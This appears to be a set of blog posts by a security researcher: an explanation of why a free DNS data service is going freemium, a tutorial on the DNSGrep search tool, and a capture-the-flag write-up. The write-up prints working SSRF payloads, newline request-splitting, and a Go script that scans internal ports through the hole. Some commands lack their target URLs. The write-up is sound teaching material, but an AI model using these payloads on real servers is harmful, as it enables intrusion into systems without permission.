Why I broke your subdomain recon pipeline last night

(or why tls.bufferover.run is moving from free to free*)


I’m moving https://tls.bufferover.run/ to a freemium model as I’ve identified numerous businesses profiting off of my non-commercial free service.


Over the past few years I have been running a couple of services hosting DNS data sources which have been widely shared and used:

  1. http://dns.bufferover.run/dns?q=.example.com

Rapid7 publishes DNS data for public use here: https://opendata.rapid7.com/ (note the license restrictions). I index this monthly when a new public dataset is published and host it to allow for easy lookups. Without this online tool, a lookup that takes about 1 second here can take 10+ minutes of grepping over the entire dataset. I wrote about this in more detail here: https://blog.erbbysam.com/index.php/2019/02/09/dnsgrep/

  2. http://tls.bufferover.run/dns?q=.example.com

I created a system to quickly scan all of IPv4 space for TLS certificates and index the DNS values found in the CN and SAN fields. I gave a talk on this at DEFCON 27 PHV: https://www.youtube.com/watch?v=1pqCqz3JzXE (slides)

These two endpoints are very widely used as shown on the graph below:

(this is roughly 20 requests per second over a 30 day period)

Commercial Use

I host both of these endpoints to give back to the security community that I have benefited so much from. On https://tls.bufferover.run I made a simple Terms of Service (TOS) returned with every response:

"TOS": "Use of this data available on this website is subject to the following terms. By accessing or using this data, you accept these terms of service. The data may not be used: 1) To do anything illegal or in violation of the rights of others, including unlawful access or damage to computers. 2) To facilitate or encourage illegal activity. 3) To be resold or repackaged for any commercial offering.",

Over the past few months I have been alerted to multiple companies reselling access to both of these endpoints or otherwise ignoring license restrictions.

For example, on one website selling a subdomain discovery service linked to other tools:

(the *.bufferover.run endpoints above are pulled in via 3 of the “passive” subdomain finding tools listed)

What should I do?

I’m left with a choice for https://tls.bufferover.run as I own this data and run the service:

  1. Ignore that others profit from reselling my free work
  2. Pursue legal action
  3. Take the service offline
  4. Create a paid service

I don’t want to take the service offline. I can’t easily pursue legal action (cost-prohibitive and jurisdiction issues). I could continue ignoring this problem but it is getting increasingly annoying with every cloud bill I receive and every new “subdomain discovery” reseller I see advertised online. That leaves option #4.

Option #4

In order to meet my original goal of giving back to the security community, I am leaving a free endpoint hosted with old data (will vary in age, approximately 90 days… this is still very useful for subdomain discovery). For commercial use and access to the latest scan, I’m going to start charging to:

  1. Recoup service costs
  2. Allow commercial use (which is clearly happening already)

Check out the options for data access here:

Epilogue — Who in the industry is handling DNS dataset licenses correctly?

To date, only 2 companies have reached out to me with licensing questions:

  1. https://www.intrigue.io/
  2. https://securitytrails.com/

DNSGrep — Quickly Searching Large DNS Datasets

The Rapid7 Project Sonar datasets are amazing resources. They represent scans across the internet, compressed and easy to download. This blog post will focus on two of these datasets:

https://opendata.rapid7.com/sonar.rdns_v2/ (rdns)
https://opendata.rapid7.com/sonar.fdns_v2/ (fdns_a)

Unfortunately, working with these datasets can be a bit slow as the rdns and fdns_a datasets each contain over 10GB of compressed text. My old workflow for using these datasets was not efficient:

ubuntu@client:~$ time gunzip -c fdns_a.json.gz | grep "erbbysam.com"
real 11m31.393s
user 12m29.212s
sys 1m37.672s

I suspected there had to be a faster way of searching these two datasets.

(TLDR, reverse and sort domains then binary search)

DNS Structure

A defining feature of the DNS system is its tree-like structure. Visiting this page, you are three levels below the root domain:


The grep query above looks for a domain name tied to the root domain, not an arbitrary string in the file. If we could shape our dataset into a DNS tree, an equivalent lookup would just require a quick traversal of this tree.

Binary Search

The task of transforming a large dataset into a tree on disk and traversing this tree can be simplified further using a binary search algorithm.

The first step in using a binary search algorithm is to sort the data. One option, matching the format above, is the form “com.erbbysam.blog”. This would require a slightly more complex DNS reversal algorithm than necessary. To simplify, reverse each line instead:
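To make the reversal concrete, here is a minimal Python sketch (not the pipeline from this post, which uses jq, tr and rev). The helper name `to_sort_key` and the sample records are made up for illustration; the addresses come from a documentation-only range. It shows that once each "value,name" line is reversed, a plain sort puts every record under the same domain next to each other:

```python
def to_sort_key(value: str, name: str) -> str:
    """Build the "value,name" line, lowercase it, and reverse it character by character."""
    return f"{value},{name}".lower()[::-1]


# Hypothetical records, for illustration only.
records = [
    ("192.0.2.1", "blog.erbbysam.com"),
    ("192.0.2.2", "example.org"),
    ("192.0.2.3", "erbbysam.com"),
    ("192.0.2.4", "www.example.org"),
]

# Python compares strings by code point, which is close to what
# LC_COLLATE=C sort does for plain ASCII data like this.
sorted_lines = sorted(to_sort_key(value, name) for value, name in records)
for line in sorted_lines:
    print(line)
```

Every line for erbbysam.com and its subdomains now starts with "moc.masybbre", so they form one contiguous run in the sorted output.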


There are no one-command solutions to sort a dataset that does not fit into memory (that I am aware of). To sort these large files, split the data into sorted chunks and then merge the results together:

# fetch the fdns_a file
wget -O fdns_a.gz https://opendata.rapid7.com/sonar.fdns_v2/2019-01-25-1548417890-fdns_a.json.gz

# extract and format our data
gunzip -c fdns_a.gz | jq -r '.value + ","+ .name' | tr '[:upper:]' '[:lower:]' | rev > fdns_a.rev.lowercase.txt

# split the data into chunks to sort
# via https://unix.stackexchange.com/a/350068 -- split and merge code
# -C (GNU split) keeps whole lines together; -b can cut a record in half at a chunk boundary
split -C 100M fdns_a.rev.lowercase.txt fileChunk

# remove the old files
rm fdns_a.gz
rm fdns_a.rev.lowercase.txt

# Sort each of the pieces and delete the unsorted one
# via https://unix.stackexchange.com/a/35472 -- use LC_COLLATE=C to sort ., chars
for f in fileChunk*; do LC_COLLATE=C sort "$f" > "$f".sorted && rm "$f"; done

# merge the sorted files with local tmp directory
mkdir -p sorttmp
LC_COLLATE=C sort -T sorttmp/ -muo fdns_a.sort.txt fileChunk*.sorted

# clean up
rm fileChunk*
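The same split, sort, and merge idea can be sketched in Python. This is only an illustration of the technique under a few assumptions: the function name `external_sort`, the `chunk_size` parameter (counted in lines, not bytes), and the temp-file handling are all mine, and for real 68G files the shell commands above are the better tool.

```python
import heapq
import itertools
import os
import tempfile


def external_sort(lines, chunk_size, tmp_dir):
    """Yield the unique input lines in sorted order, holding only one chunk in memory at a time."""
    chunk_paths = []
    source = iter(lines)
    while True:
        # Step 1: sort one chunk in memory and write it to its own temp file.
        chunk = sorted(itertools.islice(source, chunk_size))
        if not chunk:
            break
        fd, path = tempfile.mkstemp(dir=tmp_dir, text=True)
        with os.fdopen(fd, "w") as handle:
            handle.writelines(line + "\n" for line in chunk)
        chunk_paths.append(path)

    files = [open(path) for path in chunk_paths]
    try:
        # Step 2: lazily merge the sorted chunks (like sort -m) and drop duplicates (like -u).
        streams = [(line.rstrip("\n") for line in handle) for handle in files]
        previous = None
        for line in heapq.merge(*streams):
            if line != previous:
                yield line
            previous = line
    finally:
        for handle in files:
            handle.close()
        for path in chunk_paths:
            os.remove(path)


demo_dir = tempfile.mkdtemp()
merged = list(external_sort(["b", "a", "c", "a"], chunk_size=2, tmp_dir=demo_dir))
print(merged)
```

`heapq.merge` only ever holds one pending line per chunk, which is what keeps the merge step cheap in memory.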

More detailed instructions for running this script and the rdns equivalent can be found here:


Now we can search the data! To accomplish this, I built a simple golang utility that can be found here:

ubuntu@client:~$ ls -lath fdns_a.sort.txt
-rw-rw-r-- 1 ubuntu ubuntu 68G Feb  3 09:11 fdns_a.sort.txt
ubuntu@client:~$ time ./dnsgrep -f fdns_a.sort.txt -i "erbbysam.com",erbbysam.com,blog.erbbysam.com

real    0m0.002s
user    0m0.000s
sys    0m0.000s

That is significantly faster!

The algorithm is pretty simple:

  1. Use a binary search algorithm to seek through the file, looking for a substring match against the query.
  2. Once a match is found, the file is scanned backwards in 10KB increments looking for a non-matching substring.
  3. Once a non-matching substring is found, the file is scanned forwards until all exact matches are returned.
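For readers who want to experiment, here is a small Python sketch of binary searching a sorted file by byte offset. To be clear, this is not the Go utility and it is a simplified variant: instead of finding any match and scanning backwards in 10KB steps, it binary searches directly for the first line that sorts at or after the query, then scans forwards. The function names and the demo file contents are assumptions for illustration, and it does a plain prefix match with no check for a label boundary.

```python
import os
import tempfile


def _first_line_at_or_after(handle, pos):
    """Return the first full line that starts at byte offset >= pos (b"" at end of file)."""
    if pos == 0:
        handle.seek(0)
    else:
        # Step back one byte and discard the remainder of that line.
        handle.seek(pos - 1)
        handle.readline()
    return handle.readline()


def search_prefix(path, prefix):
    """Return every line of a byte-sorted file that starts with prefix."""
    needle = prefix.encode()
    with open(path, "rb") as handle:
        lo, hi = 0, os.path.getsize(path)
        while lo < hi:
            mid = (lo + hi) // 2
            line = _first_line_at_or_after(handle, mid)
            if line and line < needle:
                lo = mid + 1  # still in the part of the file that sorts below the query
            else:
                hi = mid
        matches = []
        line = _first_line_at_or_after(handle, lo)
        while line and line.startswith(needle):
            matches.append(line.rstrip(b"\n").decode())
            line = handle.readline()
        return matches


def lookup(path, domain):
    """Reverse the query, search the reversed file, and reverse the hits back."""
    return [hit[::-1] for hit in search_prefix(path, domain.lower()[::-1])]


# Hypothetical, already-sorted demo data in the reversed "value,name" layout.
demo_lines = [
    "gro.elpmaxe,2.2.0.291",
    "gro.elpmaxe.www,4.2.0.291",
    "moc.masybbre,3.2.0.291",
    "moc.masybbre.golb,1.2.0.291",
]
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as tmp:
    tmp.write("\n".join(demo_lines) + "\n")
    demo_path = tmp.name

hits = lookup(demo_path, "erbbysam.com")
print(hits)
os.remove(demo_path)
```

Each probe is one seek plus two short reads, so the number of disk accesses grows with the logarithm of the file size rather than the file size itself.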


PoC disclaimer: There is no uptime/performance guarantee of this service and I likely will take this offline at some point in the future. Keep in mind that the datasets here are from a scan on 1/25/19 — DNS records may have changed by the time you read this.

As these queries are so quick, I set up an AWS EC2 t2.micro instance with a spinning disk (Cold HDD sc1) and hosted a server that allows queries into these datasets:


ubuntu@client:~$ curl 'https://dns.bufferover.run/dns?q=erbbysam.com' 
	"Meta": {
		"Runtime": "0.000361 seconds",
		"Errors": [
			"rdns error: failed to find exact match via binary search"
		"FileNames": [
		"TOS": "The source of this data is Rapid7 Labs. Please review the Terms of Service: https://opendata.rapid7.com/about/"
	"FDNS_A": [
	"RDNS": null

Having a bit of fun with this, I queried every North Korean domain name, grepping for the IPs not in North Korean IP space:

 ubuntu@client:~$ curl 'https://dns.bufferover.run/dns?q=.kp' 2> /dev/null | grep -v "\"175\.45\.17"
	"Meta": {
		"Runtime": "0.000534 seconds",
		"Errors": null,
		"FileNames": [
		"TOS": "The source of this data is Rapid7 Labs. Please review the Terms of Service: https://opendata.rapid7.com/about/"
	"FDNS_A": [
	"RDNS": [

That’s it! Hopefully this was useful! Give it a try: https://dns.bufferover.run/dns?q=<hostname>

H1-212 CTF

As with most problems in the world, this one started with a tweet:

Let’s find that flag!


# step 0
curl -v
# step 1 
curl -v -H 'Host: admin.acme.org'
# step 2
curl -v -H 'Host: admin.acme.org' --cookie 'admin=yes'
# step 3
curl -v -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST
# step 4
curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{}'
# step 5
curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:22 @212.example.com"}'
curl -s ID) -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
# step 6
curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:1337 @212.example.com"}'
curl -s ID) -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
# step 7
curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:1337/flag\n212.example.com"}'
curl -s ID - 1) -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
# step 7, output
FLAG: CF,2dsV\/]fRAYQ.TDEp`w"M(%mU;p9+9FD{Z48X*Jtt{%vS($g7\S):f%=P[Y@nka=<tqhnF<aq=K5:BC@Sb*{[%z"+@yPb/nfFna<e$hv{p8r2[vMMF52y:z/Dh;{6

Or if you would prefer a tweet sized solution:

H="Host: admin.acme.org";B="admin=yes";curl$(expr $(curl -s -H "$H" -b "$B" -d '{"domain":"0:1337/flag\n212.h.com"}' -H "Content-Type: application/json"|sed 's/.*=\(.*\)\"}/\1/') - 1) -s -H "$H" -b "$B"|jq -r '.data'|base64 -d

But I digress. Still here? Cool, let’s find this flag and document the snags I hit along the way.

Step 1 — Virtual hosting greets us with a default Ubuntu install:


This is the last time we will use our web browser for this CTF (curl time!)!

From the original tweet & blog post, we know to search for an “admin” interface on the target server. We should check for “admin” hostnames (and paths, see setback 1.a below) for sites hosted on the same server. This technique of hosting multiple sites behind the same IP/port is called name-based virtual hosting.

Checking any hostname returns the Apache2 Ubuntu default page, with the exception of admin.acme.org:

ubuntu@client:~$ curl -v -H 'Host: admin.acme.org'
*   Trying
* Connected to ( port 80 (#0)
> GET / HTTP/1.1
> Host: admin.acme.org
> User-Agent: curl/7.54.0
> Accept: */*
< HTTP/1.1 200 OK
< Date: Fri, 17 Nov 2017 23:30:19 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: admin=no
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8

For admin.acme.org we are provided a blank page and a cookie “admin=no”!

Setback 1.a — Brute force

Executing a brute force scan of the root directory returns nothing exciting, except a fake flag.

DNS or other related recon methods will not work as the public acme.org is not associated with this machine.

Step 2 — admin=yes

If we try a few values for the admin cookie, we find the only value that returns anything other than an HTTP 200 return code is “admin=yes”:

ubuntu@client:~$ curl -v -H 'Host: admin.acme.org' --cookie 'admin=yes'
*   Trying
* Connected to ( port 80 (#0)
> GET / HTTP/1.1
> Host: admin.acme.org
> User-Agent: curl/7.54.0
> Accept: */*
> Cookie: admin=yes
< HTTP/1.1 405 Method Not Allowed
< Date: Sat, 18 Nov 2017 00:25:51 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8

At this point, we have a server returning a 405, which is not terribly exciting. At least there were no setbacks with this step 🙂

Step 3 — What is a 405?

An HTTP 405 response is defined as:

The 405 (Method Not Allowed) status code indicates that the method
received in the request-line is known by the origin server but not
supported by the target resource. The origin server MUST generate an
Allow header field in a 405 response containing a list of the target
resource’s currently supported methods.

An HTTP method refers to the verb sent by the client. In the above case this was “GET”, but there are many other options available. The only method that returns anything different is POST, which can be observed returning a 406 error:

ubuntu@client:~$ curl -v -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST
*   Trying
* Connected to ( port 80 (#0)
> POST / HTTP/1.1
> Host: admin.acme.org
> User-Agent: curl/7.54.0
> Accept: */*
> Cookie: admin=yes
< HTTP/1.1 406 Not Acceptable
< Date: Sat, 18 Nov 2017 00:37:46 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8


An OPTIONS method with a * request target returns a list of allowed methods:

ubuntu@client:~$ curl -v* -H 'Host: admin.acme.org' --cookie 'admin=yes' -X OPTIONS 2>&1 | grep Allow

Setback 3.a — 405 vs 406

I spent hours trying other HTTP methods as I did not notice that the POST request type returned a 406.

Step 4 — What is a 406?

Noticing a theme here yet? 🙂

An HTTP 406 response is defined as:

The 406 (Not Acceptable) status code indicates that the target
resource does not have a current representation that would be
acceptable to the user agent, according to the proactive negotiation
header fields received in the request (Section 5.3), and the server
is unwilling to supply a default representation.

A 406 typically refers to the Accept headers sent by a client (see setback 4.a). In our case, since we are sending a POST request which generally contains data, the server is complaining that our data is not correctly formatted. If we send a request with a content type “application/json”, we receive this response:

ubuntu@client:~$ curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json"
{"error":{"body":"unable to decode"}}

By adding some data, we see that we are missing a domain field:

ubuntu@client:~$ curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{}'

These errors actually come in as 418 teapot responses 🍵🍵🍵.

Setback 4.a — Accept all the things

As I thought the 406 status code indicated something was missing from my “Accept” HTTP header (implying */* was not acceptable), I spent far too long gathering different acceptable Accept media types.

Step 5 — Domains

Sending domain requests allows us to ascertain the rules regarding the domain that must be followed:

  1. The domain must match the regex .*212.*\..*\.com for example 212.h.com and abc212abc.abc.com are both valid
  2. The domain cannot contain the characters: ? & \ % #
  3. The domain is parsed by php libcurl
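Rules 1 and 2 are easy to model locally, which helps when trying payloads before sending them. The sketch below is my guess at the checks, not the server's actual code: the name `passes_rules` is made up, and I am assuming the regex is applied as an unanchored search, which I could not confirm from the outside.

```python
import re

# Rule 1: the regex observed from the server's error messages.
DOMAIN_RULE = re.compile(r".*212.*\..*\.com")
# Rule 2: characters the server rejects.
FORBIDDEN = set("?&\\%#")


def passes_rules(domain: str) -> bool:
    """Return True if the domain would get past rules 1 and 2 as modelled here."""
    if any(ch in FORBIDDEN for ch in domain):
        return False
    # Assumption: an unanchored search, so the match may start anywhere in the string.
    return DOMAIN_RULE.search(domain) is not None


for candidate in [
    "212.h.com",
    "abc212abc.abc.com",
    "localhost:22 @212.example.com",
    "localhost:1337/flag\n212.example.com",
    "212.com",
    "212.h.com?x=1",
]:
    print(repr(candidate), passes_rules(candidate))
```

Under that assumption anything can sit in front of a valid-looking 212 domain, including a space, an @, or a newline, because the search only needs one part of the string to match.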

To put this into practice, let’s send a sample request (which will GET / from 212.erbbysam.com). Note that this is a 2 step process:

ubuntu@client:~$ curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"212.erbbysam.com"}'
ubuntu@client:~$ curl -s -H 'Host: admin.acme.org' --cookie 'admin=yes'
{"data":"(base64 data removed)"}

Rule 3 above becomes obvious when the string “localhost:22 @212.example.com” is provided as a domain:

ubuntu@client:~$ curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:22 @212.example.com"}'
ubuntu@client:~$ curl -s -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
Protocol mismatch.

That string may look familiar as it is very similar to php libcurl issues that were observed in one of the best talks to come out of Vegas this year (besides my own 🙂 ) – https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf

Aside — Tornado black hole

Hosting a simple python tornado server at 212.erbbysam.com allowed me to reason about what the server’s code actually looked like by observing the requests coming in:

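import tornado.ioloop
import tornado.web

class MainHandler(tornado.web.RequestHandler):
    def get(self):
        # log every incoming request so we can see exactly what the CTF server sends
        print(self.request)

def make_app():
    return tornado.web.Application([
        (r"/.*", MainHandler),
    ])

if __name__ == "__main__":
    app = make_app()
    # port 80 is an assumption here: it is where a plain http:// fetch would land
    app.listen(80)
    tornado.ioloop.IOLoop.current().start()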

Step 6 — Internal network scan

Suspecting that pivoting to something only accessible locally was the next step (while trying all the things™), I set up a simple Go executable to scan every port accessible (similar to port 22 above):

package main

import "fmt"
import "os/exec"
import "strings"
import "strconv"

// Cmd runs a shell command and returns whatever it wrote to stdout.
func Cmd(cmd string) []byte {
    out, err := exec.Command("bash", "-c", cmd).Output()
    if err != nil {
        fmt.Printf("error -- %s\n", cmd)
    }
    return out
}

func main() {
    port := 0
    for port <= 65535 {
        fmt.Printf("%d -- ", port)
        // ask the server to fetch localhost:<port>
        cmd := fmt.Sprintf("curl http://admin.acme.org/index.php --header 'Host: admin.acme.org' --cookie 'admin=yes' -v -X POST -d '{\"domain\":\"localhost:%d @212.example.com\"}' -H 'Content-Type: application/json' --max-time 10 ", port)
        out := string(Cmd(cmd))
        // strip the {"next":"\/read.php?id=N"} wrapper down to N
        out =  strings.TrimLeft(strings.TrimRight(out,"\"}"),"{\"next\":\"\\/read.php?id=")
        num_out, err := strconv.Atoi(out)

        if err == nil {
            // the read URL was lost from this listing; rebuilt here from the "next" path above
            cmd = fmt.Sprintf("curl http://admin.acme.org/read.php?id=%d --header 'Host: admin.acme.org' --cookie \"admin=yes\" -v --max-time 10 ", num_out)
            out = string(Cmd(cmd))
            fmt.Println(out)
        } else {
            fmt.Println("error")
        }
        port = port + 1
    }
}

Running this code only produced a few interesting hits:

ubuntu@client:~/go/scan$ go run test.go
22 -- {"data":"U1NILTIuMC1PcGVuU1NIXzcuMnAyIFVidW50dS00dWJ1bnR1Mi4yDQpQcm90b2NvbCBtaXNtYXRjaC4K"} (SSH example above)
53 -- error (local dns server)
80 -- {"data":"CjwhRE9DVFlQRSBodG1sIFBVQkxJQ... (default ubuntu page)
1337 -- {"data":"SG1tLCB3aGVyZSB3b3VsZCBpdCBiZT8K"} ("Hmm, where would it be?")
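The "data" values are just base64, which is what the jq and base64 -d pipeline in the earlier steps unwraps. As a small sketch, the same decoding in Python looks like this (the function name `decode_read_response` is mine; the two sample bodies are copied from the scan output above):

```python
import base64
import json


def decode_read_response(body: str) -> str:
    """Pull the "data" field out of a read.php JSON body and base64-decode it."""
    raw = base64.b64decode(json.loads(body)["data"])
    # Some services answer with non-text bytes, so decode leniently.
    return raw.decode("utf-8", errors="replace")


ssh_hit = '{"data":"U1NILTIuMC1PcGVuU1NIXzcuMnAyIFVidW50dS00dWJ1bnR1Mi4yDQpQcm90b2NvbCBtaXNtYXRjaC4K"}'
hint_hit = '{"data":"SG1tLCB3aGVyZSB3b3VsZCBpdCBiZT8K"}'

print(decode_read_response(ssh_hit))
print(decode_read_response(hint_hit))
```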

The 1337 port appears to be running an http server (and it’s hinting that we’re getting close)!

Step 7 — Reaching /flag on 1337

This part is a bit tricky. An intentional “bug” in the domain parsing script meant that a \n character would split a request into 2 separate reads (incrementing the read.php ID 2x). To demonstrate this, I will make two consecutive calls with a \n:

ubuntu@client:~$ curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:80/\n212.h.com"}'
ubuntu@client:~$ curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:1337/\n212.example.com"}'

In this case read.php?id=2140 will access “localhost:1337/” while read.php?id=2141 will access “212.example.com”. This allows us to access localhost:1337/flag and grab our flag while still satisfying the domain rules from step 5!

ubuntu@client:~$ curl -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:1337/flag\n212.example.com"}'
ubuntu@client:~$ curl -s -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
FLAG: CF,2dsV\/]fRAYQ.TDEp`w"M(%mU;p9+9FD{Z48X*Jtt{%vS($g7\S):f%=P[Y@nka=<tqhnF<aq=K5:BC@Sb*{[%z"+@yPb/nfFna<e$hv{p8r2[vMMF52y:z/Dh;{6
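The only fiddly part is the ID arithmetic: the POST response points at the second read (the 212 domain), so the flag sits one ID lower. A minimal Python sketch of that step, assuming the response body has the {"next":"\/read.php?id=N"} shape that the port scanner above strips apart (the function name `flag_read_path` is made up):

```python
import json
from urllib.parse import parse_qs, urlparse


def flag_read_path(post_response: str) -> str:
    """Given the JSON body returned by the POST, return the read path one ID earlier."""
    next_path = json.loads(post_response)["next"]  # the JSON escape \/ decodes to /
    returned_id = int(parse_qs(urlparse(next_path).query)["id"][0])
    # The newline split the request into two reads; the first one hit localhost:1337/flag.
    return f"/read.php?id={returned_id - 1}"


print(flag_read_path('{"next":"\\/read.php?id=2141"}'))
```

With the IDs from the example above, a returned ID of 2141 means the localhost read is at id=2140.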

Setback 7.a — Unicode characters

Using the python tornado server above, I observed that any Unicode character (as \uXXXX where X is a hex character) could be passed through the server (with the exception of the character list in step 5). This is due to the use of JSON encoding, but was entirely unused here.

Setback 7.b — \n

I could not figure out why my request would disappear when a \n was passed in (no error appeared and no domain was contacted). My breakthrough came when I tried the domain “212.erbbysam.com:80/flag\n212.erbbysam.com” and saw a GET / arrive for the ID that was returned. I then noticed the ID had incremented twice: the 1st ID would GET /flag, and the 2nd ID (the value returned) would GET /.


In conclusion, never stop trying all the things™ and always be on the lookout for interesting papers and presentations (I’m not sure if I would have finished this without knowing about that Black Hat URL parser presentation).

Taking the curl requests from step 7, creating a few temporary bash variables and changing “localhost” to “0” we reduce this CTF to proper tweet form (277 characters):

H="Host: admin.acme.org";B="admin=yes";curl$(expr $(curl -s -H "$H" -b "$B" -d '{"domain":"0:1337/flag\n212.h.com"}' -H "Content-Type: application/json"|sed 's/.*=\(.*\)\"}/\1/') - 1) -s -H "$H" -b "$B"|jq -r '.data'|base64 -d

Huge shout-out to @NahamSec and @jobertama for this awesome challenge & thanks for reading 🙂